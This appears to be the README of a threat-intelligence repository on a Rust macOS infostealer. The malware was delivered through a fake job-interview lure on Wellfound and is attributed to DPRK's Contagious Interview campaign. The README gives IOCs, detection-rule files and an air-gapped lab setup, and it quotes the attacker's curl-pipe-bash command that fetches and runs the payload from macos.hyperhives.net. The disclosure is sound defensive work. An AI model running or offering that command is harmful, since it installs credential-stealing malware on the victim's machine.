
Full static analysis of HyperHives macOS Rust infostealer — 571 decrypted config values, C2 infrastructure, DPRK/Contagious Interview attribution, YARA/Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer
Threat intelligence: Rust-based macOS universal binary infostealer delivered through a fake job interview pipeline on Wellfound (formerly AngelList). The operator persona "Felix" from "HyperHive" lured targets into running a malicious installer from
macos.hyperhives.net. This repository documents complete static analysis: 571 encrypted configuration values recovered, including C2 URLs, a Sentry DSN, and 276 targeted Chrome extension IDs.
| Sample SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2 Domain | cloudproxy.link |
| Delivery Domain | macos.hyperhives.net |
| Lure platform | Wellfound (formerly AngelList) |
| Operator persona | "Felix" at "HyperHive" |
| VirusTotal | 9 / 63 detections |
| Classification | Public disclosure / IOC bundle |
| Last updated | April 2026 |
| File | Format | Purpose |
|---|---|---|
iocs.txt | Plain text | Hashes, domains, URLs, IPs, email, Sentry IDs — paste into blocklists, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Known-sample hash match + heuristic string detections for Mach-O |
sigma_rules.yml | Sigma | Proxy, DNS, and process-creation rules — tune logsource for your SIEM |
stix/bundle.json | STIX 2.1 | Machine-readable CTI bundle with indicators, malware SDO, infrastructure, ATT&CK patterns, and relationships |
attack-navigator-layer.json | ATT&CK Navigator | Import into ATT&CK Navigator for visual technique coverage |
.
├── README.md # This report
├── iocs.txt # Flat IOC list
├── yara_rules.yar # YARA detection rules
├── sigma_rules.yml # Sigma detection rules
├── stix/
│ └── bundle.json # STIX 2.1 threat-intelligence bundle
├── attack-navigator-layer.json # ATT&CK Navigator layer
├── output/
│ ├── full_decrypted_config.json # Machine-readable decrypted configuration
│ ├── iocs.json # Structured IOC export
│ ├── c2_protocol.txt # C2 protocol field documentation
│ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates)
│ ├── source_map.txt # Reconstructed source-file layout
│ └── targets.txt # Targeted applications and data paths
├── scripts/
│ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation)
│ ├── analyze.py # Static analysis driver
│ ├── extract_all.py # String and structure extractor
│ ├── r2_analyze.py # Radare2 analysis automation
│ ├── r2_targeted.py # Targeted R2 analysis for helpers
│ └── validate_repo.py # CI validation script
├── sample/
│ └── README.md # Instructions for sample placement
├── Dockerfile # Analysis container image
├── docker-compose.yml # Air-gapped compose config
├── lab.sh # Helper script for Docker lab
├── SECURITY.md # Safe handling and vulnerability reporting
├── CONTRIBUTING.md # Contribution guidelines
├── CHANGELOG.md # Release history
├── LICENSE # MIT
└── .github/
├── workflows/validate.yml # CI: YARA + Sigma + file checks
├── ISSUE_TEMPLATE/ # Structured issue forms
└── PULL_REQUEST_TEMPLATE.md # PR checklist
Place the sample as sample/installer_binary (see sample/README.md for hash verification), then:
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
The compose file enforces network_mode: none, read_only: true, and drops all Linux capabilities. See SECURITY.md for full handling guidelines.
A job posting on Wellfound (formerly AngelList) led to a multi-email social-engineering chain from an operator persona "Felix" at "HyperHive". After flattering the target's technical background and scheduling a fake interview, the attacker directed the victim to "review the product" at hyperhives.net and specifically examine Settings → Diagnostics → Log — a pretext to trigger execution of:
curl -s https://macos.hyperhives.net/install | nohup bash &
The payload is an 8.5 MB Mach-O universal binary (x86_64 + arm64) compiled in Rust. Static analysis with an air-gapped Docker lab and CPU emulation of 570 unique x86_64 helper routines recovered all 571 encrypted configuration values, exposing:
cloudproxy.link — four HTTPS endpointsingest.de.sentry.iorootr, codename force, version 9.12.1Tactics align with DPRK-linked Contagious Interview campaigns — fake job recruiting on legitimate platforms, multi-step trust building, curl | bash delivery, Rust macOS stealer, and crypto-focused exfiltration.
The attack began with a legitimate-looking job posting on Wellfound (formerly AngelList). After the target applied, the following email chain ensued from an operator using the persona "Felix" and the company name "HyperHive":